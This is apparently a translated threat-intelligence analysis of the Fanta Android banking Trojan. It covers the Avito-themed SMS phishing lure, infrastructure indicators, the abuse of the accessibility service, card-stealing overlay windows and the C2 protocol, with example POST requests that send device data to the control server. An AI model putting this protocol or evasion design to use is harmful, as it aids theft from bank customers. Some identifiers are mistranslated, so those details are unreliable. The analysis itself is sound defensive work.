Leisya, Fanta: පැරණි Android Trojan හි නව උපක්‍රම

දිනක් ඔබට Avito හි යමක් විකිණීමට අවශ්‍ය වන අතර, ඔබේ නිෂ්පාදනය පිළිබඳ සවිස්තරාත්මක විස්තරයක් පළ කිරීමෙන් පසු (උදාහරණයක් ලෙස, RAM මොඩියුලයක්), ඔබට මෙම පණිවිඩය ලැබෙනු ඇත:

ඔබ සබැඳිය විවෘත කළ පසු, සතුටුදායක සහ සාර්ථක විකුණුම්කරු වන ඔබට මිලදී ගැනීමක් සිදු කර ඇති බව දැනුම් දෙන අහිංසක පිටුවක් ඔබට පෙනෙනු ඇත:

ඔබ "ඉදිරියට යන්න" බොත්තම ක්ලික් කළ පසු, අයිකනයක් සහ විශ්වාසනීය නමක් සහිත APK ගොනුවක් ඔබගේ ඇන්ඩ්‍රොයිඩ් උපාංගයට බාගනු ඇත. ඔබ කිසියම් හේතුවක් නිසා ප්‍රවේශ්‍යතා සේවා අයිතීන් ඉල්ලා සිටි යෙදුමක් ස්ථාපනය කර, පසුව කවුළු කිහිපයක් දිස් වූ අතර ඉක්මනින් අතුරුදහන් වූ අතර... එපමණයි.

ඔබ ඔබගේ ශේෂය පරීක්ෂා කිරීමට යයි, නමුත් යම් හේතුවක් නිසා ඔබගේ බැංකු යෙදුම ඔබගේ කාඩ්පත් විස්තර නැවත අසයි. දත්ත ඇතුළත් කිරීමෙන් පසු භයානක දෙයක් සිදු වේ: කිසියම් හේතුවක් නිසා ඔබට තවමත් අපැහැදිලි වේ, ඔබේ ගිණුමෙන් මුදල් අතුරුදහන් වීමට පටන් ගනී. ඔබ ගැටළුව විසඳීමට උත්සාහ කරයි, නමුත් ඔබගේ දුරකථනය ප්‍රතිරෝධය දක්වයි: එය "ආපසු" සහ "මුල් පිටුව" යතුරු එබීම, අක්‍රිය නොකරන අතර ඔබට කිසිදු ආරක්ෂක පියවරක් සක්‍රිය කිරීමට ඉඩ නොදේ. ප්රතිඵලයක් වශයෙන්, ඔබට මුදල් නොමැතිව ඉතිරි වී ඇත, ඔබේ භාණ්ඩ මිලදී ගෙන නොමැත, ඔබ ව්යාකූල වී පුදුමයට පත් වී ඇත: සිදුවූයේ කුමක්ද?

පිළිතුර සරලයි: ඔබ Flexnet පවුලේ සාමාජිකයෙකු වන Android Trojan Fanta හි ගොදුරක් බවට පත්ව ඇත. මෙය සිදුවූයේ කෙසේ? අපි දැන් පැහැදිලි කරමු.

කතුවරුන්: Andrey Polovinkin, අනිෂ්ට මෘදුකාංග විශ්ලේෂණය පිළිබඳ කනිෂ්ඨ විශේෂඥ, අයිවන් පිසරෙව්, අනිෂ්ට මෘදුකාංග විශ්ලේෂණය පිළිබඳ විශේෂඥ.

සමහර සංඛ්යාලේඛන

Android Trojans හි Flexnet පවුල මුලින්ම ප්‍රසිද්ධියට පත් වූයේ 2015 දී ය. තරමක් දිගු කාල පරිච්ඡේදයක් තුළ, පවුල උප විශේෂ කිහිපයකට ව්‍යාප්ත විය: ෆැන්ටා, ලයිම්බොට්, ලිප්ටන්, ආදිය. ට්‍රෝජන් මෙන්ම ඒ හා සම්බන්ධ යටිතල පහසුකම් ද නිශ්චල නොවේ: නව ඵලදායී බෙදා හැරීමේ යෝජනා ක්‍රම සංවර්ධනය වෙමින් පවතී - අපගේ නඩුවේදී, විශේෂිත පරිශීලක-විකුණුම්කරුවෙකු ඉලක්ක කරගත් උසස් තත්ත්වයේ තතුබෑම් පිටු, සහ ට්‍රෝජන් සංවර්ධකයින් විලාසිතාමය ප්‍රවණතා අනුගමනය කරයි. වෛරස් ලිවීම - ආසාදිත උපාංගවලින් වඩාත් කාර්යක්ෂමව මුදල් සොරකම් කිරීමට හැකි වන පරිදි නව ක්‍රියාකාරීත්වයක් එක් කිරීම සහ ආරක්‍ෂක යාන්ත්‍රණය මඟහැරීම.

මෙම ලිපියේ විස්තර කර ඇති ව්‍යාපාරය රුසියාවේ පරිශීලකයින් ඉලක්ක කර ගෙන ඇත;

Flexnet දැන් වසර 4කට වැඩි කාලයක් Android Trojan ක්ෂේත්‍රයේ පැවතී බොහෝ පර්යේෂකයන් විසින් සවිස්තරාත්මකව අධ්‍යයනය කර ඇතත්, එය තවමත් හොඳ තත්ත්වයේ පවතී. 2019 ජනවාරි සිට, හානියේ විභව ප්‍රමාණය රුබල් මිලියන 35 කට වඩා වැඩිය - මෙය රුසියාවේ ව්‍යාපාර සඳහා පමණි. 2015 දී, මෙම ඇන්ඩ්‍රොයිඩ් ට්‍රෝජන් හි විවිධ අනුවාද භූගත සංසදවල අලෙවි කරන ලද අතර එහිදී සවිස්තරාත්මක විස්තරයක් සහිත ට්‍රෝජන් මූල කේතය ද සොයාගත හැකිය. මෙයින් අදහස් කරන්නේ ලෝකයේ හානිය පිළිබඳ සංඛ්‍යාලේඛන ඊටත් වඩා ආකර්ෂණීය බවයි. එවැනි වයසක මිනිසෙකු සඳහා නරක දර්ශකයක් නොවේ, එසේ නොවේ ද?

විකිණීමේ සිට රැවටීම දක්වා

Avito දැන්වීම් පළ කිරීම සඳහා අන්තර්ජාල සේවාව සඳහා තතුබෑම් පිටුවක කලින් ඉදිරිපත් කරන ලද තිර පිටපතෙන් දැකිය හැකි පරිදි, එය විශේෂිත ගොදුරක් සඳහා සූදානම් කර ඇත. පෙනෙන විදිහට, ප්‍රහාරකයින් Avito හි එක් විග්‍රහයක් භාවිතා කරයි, එය විකුණුම්කරුගේ දුරකථන අංකය සහ නම මෙන්ම නිෂ්පාදන විස්තරය උපුටා ගනී. පිටුව පුළුල් කර APK ගොනුව සකස් කිරීමෙන් පසු, වින්දිතයාට ඔහුගේ නම සහ ඔහුගේ නිෂ්පාදනයේ විස්තරයක් සහ නිෂ්පාදනයේ “විකිණීමෙන්” ලැබුණු මුදල අඩංගු තතුබෑම් පිටුවකට සබැඳියක් සමඟ කෙටි පණිවුඩයක් යවනු ලැබේ. බොත්තම මත ක්ලික් කිරීමෙන් පරිශීලකයාට අනිෂ්ට APK ගොනුවක් ලැබේ - ෆැන්ටා.

shcet491[.]ru වසම පිළිබඳ අධ්‍යයනයකින් පෙන්නුම් කළේ එය Hostinger හි DNS සේවාදායකයන් වෙත පවරා ඇති බවයි:

• ns1.hostinger.ru
• ns2.hostinger.ru
• ns3.hostinger.ru
• ns4.hostinger.ru

වසම් කලාප ගොනුවේ IP ලිපින 31.220.23[.]236, 31.220.23[.]243, සහ 31.220.23[.]235 වෙත යොමු කරන ඇතුළත් කිරීම් අඩංගු වේ. කෙසේ වෙතත්, වසමේ ප්‍රාථමික සම්පත් වාර්තාව (A වාර්තාව) IP ලිපිනය 178.132.1[.]240 සහිත සේවාදායකයක් වෙත යොමු කරයි.

IP ලිපිනය 178.132.1[.]240 නෙදර්ලන්තයේ පිහිටා ඇති අතර එය සත්කාරක සමාගමට අයත් වේ. WorldStream. IP ලිපින 31.220.23[.]235, 31.220.23[.]236 සහ 31.220.23[.]243 එක්සත් රාජධානියේ පිහිටා ඇති අතර ඒවා HOSTINGER හවුල් සත්කාරක සේවාදායකයට අයත් වේ. රෙකෝඩරයක් ලෙස භාවිතා කරයි openprov-ru. පහත වසම් 178.132.1[.]240 IP ලිපිනයට ද විසඳා ඇත:

• sdelka-ru[.]ru
• tovar-av[.]ru
• av-tovar[.]ru
• ru-sdelka[.]ru
• shcet382[.]ru
• sdelka221[.]ru
• sdelka211[.]ru
• vyplata437[.]ru
• viplata291[.]ru
• perevod273[.]ru
• perevod901[.]ru

පහත ආකෘතියේ සබැඳි සෑම වසමකින්ම පාහේ ලබා ගත හැකි බව සටහන් කළ යුතුය:

http://(www.){0,1}<%domain%>/[0-9]{7}

මෙම සැකිල්ලට SMS පණිවිඩයකින් සබැඳියක් ද ඇතුළත් වේ. ඉතිහාස දත්ත මත පදනම්ව, එක් වසමක් ඉහත විස්තර කර ඇති රටාවේ සබැඳි කිහිපයකට අනුරූප වන බව සොයා ගන්නා ලදී, එයින් පෙන්නුම් කරන්නේ එක් වසමක් වින්දිතයින් කිහිප දෙනෙකුට ට්‍රෝජන් බෙදා හැරීමට භාවිතා කර ඇති බවයි.

අපි ටිකක් ඉදිරියට යමු: කෙටි පණිවුඩයකින් සබැඳියක් හරහා බාගත කළ ට්‍රෝජන් ලිපිනය පාලන සේවාදායකයක් ලෙස භාවිතා කරයි onusedseddohap[.]club. මෙම වසම 2019-03-12 ලියාපදිංචි කරන ලද අතර, 2019-04-29 සිට, APK යෙදුම් මෙම වසම සමඟ අන්තර්ක්‍රියා කළේය. VirusTotal වෙතින් ලබාගත් දත්ත මත පදනම්ව, සම්පූර්ණ යෙදුම් 109 ක් මෙම සේවාදායකය සමඟ අන්තර්ක්‍රියා කළේය. වසම IP ලිපිනයට විසඳා ඇත 217.23.14[.]27, නෙදර්ලන්තයේ පිහිටා ඇති අතර සත්කාරක සමාගමට අයත් වේ WorldStream. රෙකෝඩරයක් ලෙස භාවිතා කරයි නාම මිල. වසම් ද මෙම IP ලිපිනයට විසඳා ඇත bad-racoon[.]සමාජය (2018-09-25 සිට ආරම්භ වේ) සහ bad-racoon[.]සජීවී (2018-10-25 සිට ආරම්භ වේ). වසම සමඟ bad-racoon[.]සමාජය APK ගොනු 80කට වඩා අන්තර්ක්‍රියා කර ඇත bad-racoon[.]සජීවී - 100 ට වැඩි.

පොදුවේ ගත් කල, ප්රහාරය පහත පරිදි සිදු වේ:

ෆැන්ටා පියන යටතේ ඇත්තේ කුමක්ද?

අනෙකුත් බොහෝ ඇන්ඩ්‍රොයිඩ් ට්‍රෝජන් මෙන්, ෆැන්ටාට SMS පණිවිඩ කියවීමට සහ යැවීමට, USSD ඉල්ලීම් කිරීමට සහ යෙදුම් මත (බැංකු ඇතුළුව) තමන්ගේම කවුළු ප්‍රදර්ශනය කිරීමට හැකියාව ඇත. කෙසේ වෙතත්, මෙම පවුලේ ක්රියාකාරිත්වයේ අවි ගබඩාව පැමිණ ඇත: ෆැන්ටා භාවිතා කිරීමට පටන් ගත්තේය ප්‍රවේශ්‍යතා සේවාව විවිධ අරමුණු සඳහා: වෙනත් යෙදුම් වලින් දැනුම්දීම් වල අන්තර්ගතය කියවීම, හඳුනාගැනීම වැළැක්වීම සහ ආසාදිත උපාංගයක ට්‍රෝජන් ක්‍රියාත්මක කිරීම නැවැත්වීම යනාදිය. Fanta 4.4 ට අඩු නොවන Android හි සියලුම අනුවාද වල ක්‍රියා කරයි. මෙම ලිපියෙන් අපි පහත ෆැන්ටා නියැදිය දෙස සමීපව බලමු:

• MD5: 0826bd11b2c130c4c8ac137e395ac2d4
• SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
• SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

දියත් කළ වහාම

දියත් කළ වහාම ට්‍රෝජන් එහි නිරූපකය සඟවයි. යෙදුම ක්‍රියා කළ හැක්කේ ආසාදිත උපාංගයේ නම ලැයිස්තුවේ නොමැති නම් පමණි:

• android_x86
• VirtualBox
• Nexus 5X(බුල්හෙඩ්)
• Nexus 5(රේසර්)

මෙම චෙක්පත සිදු කරනු ලබන්නේ ට්‍රෝජන් හි ප්‍රධාන සේවයේ ය. ප්රධාන සේවාව. පළමු වරට දියත් කරන විට, යෙදුමේ වින්‍යාස පරාමිතීන් පෙරනිමි අගයන් වෙත ආරම්භ කර ඇත (වින්‍යාස දත්ත ගබඩා කිරීමේ ආකෘතිය සහ ඒවායේ අර්ථය පසුව සාකච්ඡා කරනු ඇත), සහ නව ආසාදිත උපාංගයක් පාලන සේවාදායකයේ ලියාපදිංචි වේ. පණිවිඩ වර්ගය සහිත HTTP POST ඉල්ලීමක් සේවාදායකය වෙත යවනු ලැබේ ලියාපදිංචි_බොට් සහ ආසාදිත උපාංගය පිළිබඳ තොරතුරු (Android අනුවාදය, IMEI, දුරකථන අංකය, ක්රියාකරුගේ නම සහ ක්රියාකරු ලියාපදිංචි කර ඇති රටේ කේතය). ලිපිනය පාලක සේවාදායකය ලෙස සේවය කරයි hXXp://onuseseddohap[.]club/controller.php. ප්රතිචාර වශයෙන්, සේවාදායකයා ක්ෂේත්ර අඩංගු පණිවිඩයක් යවයි bot_id, bot_pwd, සේවාදායකය - යෙදුම මෙම අගයන් CnC සේවාදායකයේ පරාමිතීන් ලෙස සුරකියි. පරාමිතිය සේවාදායකය ක්ෂේත්‍රය නොලැබුනේ නම් විකල්පමය: ෆැන්ටා ලියාපදිංචි ලිපිනය භාවිතා කරයි - hXXp://onuseseddohap[.]club/controller.php. CnC ලිපිනය වෙනස් කිරීමේ කාර්යය ගැටළු දෙකක් විසඳීමට භාවිතා කළ හැකිය: සේවාදායකයන් කිහිපයක් අතර බර ඒකාකාරව බෙදා හැරීම (ආසාදිත උපාංග විශාල සංඛ්‍යාවක් තිබේ නම්, ප්‍රශස්ත නොකළ වෙබ් සේවාදායකයක බර වැඩි විය හැක) සහ භාවිතා කිරීමට. CnC සේවාදායකයන්ගෙන් එකක් අසාර්ථක වූ විට විකල්ප සේවාදායකයක්.

ඉල්ලීම යැවීමේදී දෝෂයක් සිදුවුවහොත්, ට්‍රෝජන් තත්පර 20 කට පසු ලියාපදිංචි කිරීමේ ක්‍රියාවලිය නැවත සිදු කරයි.

උපාංගය සාර්ථකව ලියාපදිංචි වූ පසු, Fanta පරිශීලකයාට පහත පණිවිඩය පෙන්වනු ඇත:

වැදගත් සටහන: සේවාව ඇමතීම පද්ධති ආරක්ෂාව - ට්‍රෝජන් සේවාවේ නම සහ බොත්තම ක්ලික් කිරීමෙන් පසු හරි ආසාදිත උපාංගයේ ප්‍රවේශ්‍යතා සැකසීම් සමඟ කවුළුවක් විවෘත වනු ඇත, එහිදී පරිශීලකයා අනිෂ්ට සේවාව සඳහා ප්‍රවේශ්‍යතා අයිතිවාසිකම් ලබා දිය යුතුය:

පරිශීලකයා සක්රිය කළ වහාම ප්‍රවේශ්‍යතා සේවාව, Fanta යෙදුම් කවුළු වල අන්තර්ගතයට සහ ඒවායේ සිදු කරන ක්‍රියාවන්ට ප්‍රවේශය ලබා ගනී:

ප්‍රවේශ්‍යතා අයිතිවාසිකම් ලැබුණු වහාම, ට්‍රෝජන් විසින් දැනුම්දීම් කියවීමට පරිපාලක අයිතිවාසිකම් සහ අයිතිවාසිකම් ඉල්ලා සිටී:

ප්‍රවේශ්‍යතා සේවාව භාවිතයෙන්, යෙදුම යතුරු එබීම් අනුකරණය කරයි, එමඟින් අවශ්‍ය සියලුම අයිතිවාසිකම් ලබා දෙයි.

Fanta විසින් වින්‍යාස දත්ත ගබඩා කිරීමට අවශ්‍ය බහු දත්ත සමුදා අවස්ථා (ඒවා පසුව විස්තර කෙරේ) මෙන්ම ආසාදිත උපාංගය පිළිබඳ ක්‍රියාවලියේදී රැස් කරන ලද තොරතුරු ද නිර්මාණය කරයි. එකතු කරන ලද තොරතුරු යැවීමට, ට්‍රෝජන් දත්ත සමුදායෙන් ක්ෂේත්‍ර බාගැනීමට සහ පාලන සේවාදායකයෙන් විධානයක් ලබා ගැනීමට සැලසුම් කර ඇති පුනරාවර්තන කාර්යයක් නිර්මාණය කරයි. CnC වෙත ප්‍රවේශ වීම සඳහා වන පරතරය ඇන්ඩ්‍රොයිඩ් අනුවාදය මත පදනම්ව සකසා ඇත: 5.1 නම්, විරාමය තත්පර 10 ක්, එසේ නොමැති නම් තත්පර 60 කි.

විධානය ලබා ගැනීම සඳහා, ෆැන්ටා ඉල්ලීමක් කරයි GetTask කළමනාකරණ සේවාදායකය වෙත. ප්‍රතිචාර වශයෙන්, CnC හට පහත විධාන වලින් එකක් යැවිය හැක:

කණ්ඩායම	විස්තර
0	SMS පණිවිඩයක් යවන්න
1	දුරකථන ඇමතුමක් හෝ USSD විධානයක් කරන්න
2	පරාමිතියක් යාවත්කාලීන කරයි පරතරය
3	පරාමිතියක් යාවත්කාලීන කරයි රැඳවුමයි
6	පරාමිතියක් යාවත්කාලීන කරයි sms Manager
9	SMS පණිවිඩ එකතු කිරීම ආරම්භ කරන්න
11	ඔබගේ දුරකථනය කර්මාන්තශාලා සැකසුම් වෙත නැවත සකසන්න
12	සංවාද කොටු සෑදීමේ ලොග් වීම සබල/අබල කරන්න

Fanta බැංකු යෙදුම් 70 කින්, වේගවත් ගෙවීම් පද්ධති සහ ඊ-පසුම්බි වලින් දැනුම්දීම් එකතු කර ඒවා දත්ත ගබඩාවක ගබඩා කරයි.

සැකසුම් පරාමිතීන් ගබඩා කිරීම

වින්‍යාස පරාමිතීන් ගබඩා කිරීම සඳහා, Fanta Android වේදිකාව සඳහා සම්මත ප්‍රවේශයක් භාවිතා කරයි - මනාප- ගොනු. සැකසීම් නම් ගොනුවකට සුරකිනු ඇත සැකසුම්. සුරකින ලද පරාමිතීන් පිළිබඳ විස්තරයක් පහත වගුවේ ඇත.

නම	පෙරනිමි අගය	හැකි අගයන්	විස්තර
id	0	පූර්ණ සංඛ්යාවක්	බොට් හැඳුනුම්පත
සේවාදායකය	hXXp://onuseseddohap[.]club/	URL එක	පාලන සේවාදායක ලිපිනය
pwd	-	String	සේවාදායක මුරපදය
පරතරය	20	පූර්ණ සංඛ්යාවක්	කාල විරාමය. පහත සඳහන් කාර්යයන් කොපමණ කාලයක් කල් දැමිය යුතුද යන්න දක්වයි: යවන ලද SMS පණිවිඩයක තත්ත්වය පිළිබඳ ඉල්ලීමක් යැවීමේදී කළමනාකරණ සේවාදායකයෙන් නව විධානයක් ලබා ගැනීම
රැඳවුමයි	සියලු	සියලු/ටෙල් අංකය	ක්ෂේත්‍රය තන්තුවට සමාන නම් සියලු හෝ දුරකථන අංකය, එවිට ලැබුණු SMS පණිවිඩය යෙදුමට බාධා වන අතර පරිශීලකයාට නොපෙන්වයි
sms Manager	0	0/1	පෙරනිමි SMS ලබන්නා ලෙස යෙදුම සබල/අබල කරන්න
ඩයලොග් කියවන්න	බොරු	හරි වැරදි	සිදුවීම් ලොග් වීම සබල/අබල කරන්න ප්‍රවේශ්‍යතා සිදුවීම

Fanta ද ගොනුව භාවිතා කරයි sms Manager:

නම	පෙරනිමි අගය	හැකි අගයන්	විස්තර
pckg	-	String	භාවිතා කරන ලද SMS පණිවිඩ කළමනාකරුගේ නම

දත්ත සමුදායන් සමඟ අන්තර් ක්රියා කිරීම

එහි ක්රියාකාරිත්වය අතරතුර, ට්රෝජන් දත්ත සමුදායන් දෙකක් භාවිතා කරයි. දත්ත සමුදාය නම් කර ඇත a දුරකථනයෙන් එකතු කරන විවිධ තොරතුරු ගබඩා කිරීමට භාවිතා කරයි. දෙවන දත්ත සමුදාය නම් කර ඇත fanta.db සහ බැංකු කාඩ්පත් පිළිබඳ තොරතුරු රැස් කිරීම සඳහා නිර්මාණය කර ඇති තතුබෑම් කවුළු නිර්මාණය කිරීම සඳහා වගකිව යුතු සැකසුම් සුරැකීමට භාවිතා කරයි.

ට්‍රෝජන් දත්ත සමුදාය භාවිතා කරයි а එකතු කරන ලද තොරතුරු ගබඩා කිරීමට සහ ඔබගේ ක්රියාවන් ලොග් කිරීමට. දත්ත වගුවක ගබඩා කර ඇත සටහන්. වගුවක් සෑදීමට, පහත SQL විමසුම භාවිතා කරන්න:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

දත්ත සමුදායේ පහත තොරතුරු අඩංගු වේ:

1. ආසාදිත උපාංගයේ ආරම්භය පණිවිඩයක් සමඟ ලොග් කිරීම දුරකථනය ක්‍රියාත්මක විය!

2. යෙදුම් වලින් දැනුම්දීම්. පහත සැකිල්ලට අනුව පණිවිඩය ජනනය වේ:

(<%App Name%>)<%Title%>: <%Notification text%>

3. ට්‍රෝජන් විසින් නිර්මාණය කරන ලද තතුබෑම් ආකෘතිවලින් බැංකු කාඩ්පත් දත්ත. පරාමිතිය VIEW_NAME පහත ඒවායින් එකක් විය හැකිය:

• අලි වේ
• අවිටෝ
• Google Play
• විවිධ <%යෙදුම් නම%>

පණිවිඩය ආකෘතියට ලොග් වී ඇත:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. ආකෘතියෙන් එන/පිටතට යන SMS පණිවිඩ:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. ආකෘතියේ සංවාද කොටුව නිර්මාණය කරන පැකේජය පිළිබඳ තොරතුරු:

(<%Package name%>)<%Package information%>

උදාහරණ වගුව සටහන්:

Fanta හි එක් ක්‍රියාකාරීත්වයක් වන්නේ බැංකු කාඩ්පත් පිළිබඳ තොරතුරු එකතු කිරීමයි. බැංකු යෙදුම් විවෘත කිරීමේදී තතුබෑම් කවුළු නිර්මාණය කිරීම හරහා දත්ත රැස් කිරීම සිදු වේ. ට්‍රෝජන් තතුබෑම් කවුළුව නිර්මාණය කරන්නේ එක් වරක් පමණි. කවුළුව පරිශීලකයාට පෙන්වූ තොරතුරු වගුවක ගබඩා කර ඇත සැකසුම් දත්ත සමුදායේ fanta.db. දත්ත සමුදායක් සෑදීමට, පහත SQL විමසුම භාවිතා කරන්න:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

සියලුම වගු ක්ෂේත්‍ර සැකසුම් පෙරනිමියෙන් 1 වෙත ආරම්භ කරන ලදී (තතුබෑම් කවුළුවක් සාදන්න). පරිශීලකයා තම දත්ත ඇතුළත් කළ පසු, අගය 0 ලෙස සැකසෙනු ඇත. වගු ක්ෂේත්‍ර සඳහා උදාහරණය සැකසුම්:

• පුරනය විය හැක - බැංකු අයදුම්පතක් විවෘත කිරීමේදී පෝරමය පෙන්වීම සඳහා ක්ෂේත්‍රය වගකිව යුතුය
• පළමු_බැංකුව - භාවිතා නොකරනලද
• can_avito - Avito යෙදුම විවෘත කිරීමේදී පෝරමය පෙන්වීම සඳහා ක්ෂේත්‍රය වගකිව යුතුය
• හැක_අලි - Aliexpress යෙදුම විවෘත කිරීමේදී පෝරමය පෙන්වීම සඳහා ක්ෂේත්‍රය වගකිව යුතුය
• පුළුවන්_වෙනත් - ලැයිස්තුවෙන් ඕනෑම යෙදුමක් විවෘත කිරීමේදී පෝරමය පෙන්වීම සඳහා ක්ෂේත්‍රය වගකිව යුතුය: යූලා, පැන්ඩෝ, ඩ්‍රොම් ඔටෝ, පසුම්බිය. වට්ටම් සහ ප්‍රසාද කාඩ්පත්, Aviasales, වෙන්කරවා ගැනීම, Trivago
• හැක_කාඩ්පත - විවෘත කිරීමේදී පෝරමය පෙන්වීම සඳහා ක්ෂේත්‍රය වගකිව යුතුය Google Play

කළමනාකරණ සේවාදායකය සමඟ අන්තර් ක්රියා කිරීම

කළමනාකරණ සේවාදායකය සමඟ ජාල අන්තර්ක්‍රියා HTTP ප්‍රොටෝකෝලය හරහා සිදු වේ. ජාලය සමඟ වැඩ කිරීමට, Fanta ජනප්රිය Retrofit පුස්තකාලය භාවිතා කරයි. ඉල්ලීම් යවනු ලබන්නේ: hXXp://onuseseddohap[.]club/controller.php. සේවාදායකයේ ලියාපදිංචි කිරීමේදී සේවාදායක ලිපිනය වෙනස් කළ හැකිය. සේවාදායකයෙන් ප්‍රතිචාර වශයෙන් කුකීස් යැවිය හැක. ෆැන්ටා සේවාදායකයට පහත ඉල්ලීම් කරයි:

• පාලක සේවාදායකයේ බොට් ලියාපදිංචි කිරීම පළමු දියත් කිරීමේදී වරක් සිදු වේ. ආසාදිත උපාංගය පිළිබඳ පහත දත්ත සේවාදායකයට යවනු ලැබේ:
  · කුකීස් - සේවාදායකයෙන් ලැබුණු කුකීස් (පෙරනිමි අගය හිස් තන්තුවකි)
  · මාදිලිය - තන්තු නියතය ලියාපදිංචි_බොට්
  · උපසර්ගය — නිඛිල නියතය 2
  · version_sdk - පහත සැකිල්ලට අනුව සෑදී ඇත: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
  · IMEI - ආසාදිත උපාංගයේ IMEI
  · රට - ISO ආකෘතියෙන් ක්රියාකරු ලියාපදිංචි කර ඇති රටේ කේතය
  · අංකය - දුරකථන අංකය
  · ක්රියාකරු - ක්රියාකරුගේ නම

  සේවාදායකය වෙත යවන ලද ඉල්ලීමක උදාහරණයක්:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 144
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
  

  ඉල්ලීමට ප්‍රතිචාර වශයෙන්, සේවාදායකය විසින් පහත පරාමිති අඩංගු JSON වස්තුවක් ආපසු ලබා දිය යුතුය:
  · bot_id - ආසාදිත උපාංගයේ හැඳුනුම්පත. bot_id 0 ට සමාන නම්, Fanta ඉල්ලීම නැවත ක්‍රියාත්මක කරයි.
  bot_pwd - සේවාදායකය සඳහා මුරපදය.
  සේවාදායකය - පාලන සේවාදායක ලිපිනය. විකල්ප පරාමිතිය. පරාමිතිය නිශ්චිතව දක්වා නොමැති නම්, යෙදුමේ සුරකින ලද ලිපිනය භාවිතා කරනු ලැබේ.

  උදාහරණ JSON වස්තුව:

  {
      "response":[
     	 {
     		 "bot_id": <%BOT_ID%>,
     		 "bot_pwd": <%BOT_PWD%>,
     		 "server": <%SERVER%>
     	 }
      ],
      "status":"ok"
  }

• සේවාදායකයෙන් විධානයක් ලබා ගැනීමට ඉල්ලීම. පහත දත්ත සේවාදායකයට යවනු ලැබේ:
  · කුකීස් - සේවාදායකයෙන් ලැබුණු කුකීස්
  · ලංසුව - ඉල්ලීම යැවීමේදී ලැබුණු ආසාදිත උපාංගයේ හැඳුනුම්පත ලියාපදිංචි_බොට්
  · pwd - සේවාදායකය සඳහා මුරපදය
  · divice_admin - පරිපාලක අයිතිවාසිකම් ලබාගෙන තිබේද යන්න ක්ෂේත්රය තීරණය කරයි. පරිපාලක අයිතිවාසිකම් ලබාගෙන තිබේ නම්, ක්ෂේත්රය සමාන වේ 1, එසේ නොමැති නම් 0
  ·  ප‍්‍රවේශවීම - ප්‍රවේශ්‍යතා සේවා මෙහෙයුම් තත්ත්වය. සේවාව ආරම්භ කළේ නම්, වටිනාකම වේ 1, එසේ නොමැති නම් 0
  · SMS කළමනාකරු - SMS ලැබීම සඳහා පෙරනිමි යෙදුම ලෙස ට්‍රෝජන් සක්‍රීය කර තිබේද යන්න පෙන්වයි
  · තිරය - තිරය කුමන තත්වයක තිබේද යන්න පෙන්වයි. අගය සැකසෙනු ඇත 1, තිරය ක්‍රියාත්මක නම්, එසේත් නැතිනම් 0;

  සේවාදායකය වෙත යවන ලද ඉල්ලීමක උදාහරණයක්:

  POST /controller.php HTTP/1.1
  Cookie:
  Content-Type: application/x-www-form-urlencoded
  Host: onuseseddohap.club
  Connection: close
  Accept-Encoding: gzip, deflate
  User-Agent: okhttp/3.6.0
  
  mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

  විධානය මත පදනම්ව, සේවාදායකයට විවිධ පරාමිති සහිත JSON වස්තුවක් ආපසු ලබා දිය හැක:

  · කණ්ඩායම SMS පණිවිඩයක් යවන්න: පරාමිතිවල දුරකථන අංකය, SMS පණිවිඩයේ පෙළ සහ යවන පණිවිඩයේ හැඳුනුම්පත අඩංගු වේ. වර්ගය සමඟ සේවාදායකයට පණිවිඩයක් යැවීමේදී හඳුනාගැනීම භාවිතා කරයි setSmsStatus.

  {
      "response":
      [
     	 {
     		 "mode": 0,
     		 "sms_number": <%SMS_NUMBER%>,
     		 "sms_text": <%SMS_TEXT%>,
     		 "sms_id": %SMS_ID%
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම දුරකථන ඇමතුමක් හෝ USSD විධානයක් කරන්න: දුරකථන අංකය හෝ විධානය පැමිණෙන්නේ ප්‍රතිචාර ශරීරය තුළය.

  {
      "response":
      [
     	 {
     		 "mode": 1,
     		 "command": <%TEL_NUMBER%>
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම විරාම පරාමිතිය වෙනස් කරන්න.

  {
      "response":
      [
     	 {
     		 "mode": 2,
     		 "interval": <%SECONDS%>
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම බාධා පරාමිතිය වෙනස් කරන්න.

  {
      "response":
      [
     	 {
     		 "mode": 3,
     		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම SmsManager ක්ෂේත්‍රය වෙනස් කරන්න.

  {
      "response":
      [
     	 {
     		 "mode": 6,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම ආසාදිත උපාංගයකින් SMS පණිවිඩ එකතු කරන්න.

  {
      "response":
      [
     	 {
     		 "mode": 9
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම ඔබගේ දුරකථනය කර්මාන්තශාලා සැකසුම් වෙත නැවත සකසන්න:

  {
      "response":
      [
     	 {
     		 "mode": 11
     	 }
      ],
      "status":"ok"
  }

  · කණ්ඩායම ReadDialog පරාමිතිය වෙනස් කරන්න.

  {
      "response":
      [
     	 {
     		 "mode": 12,
     		 "enable": 0/1
     	 }
      ],
      "status":"ok"
  }

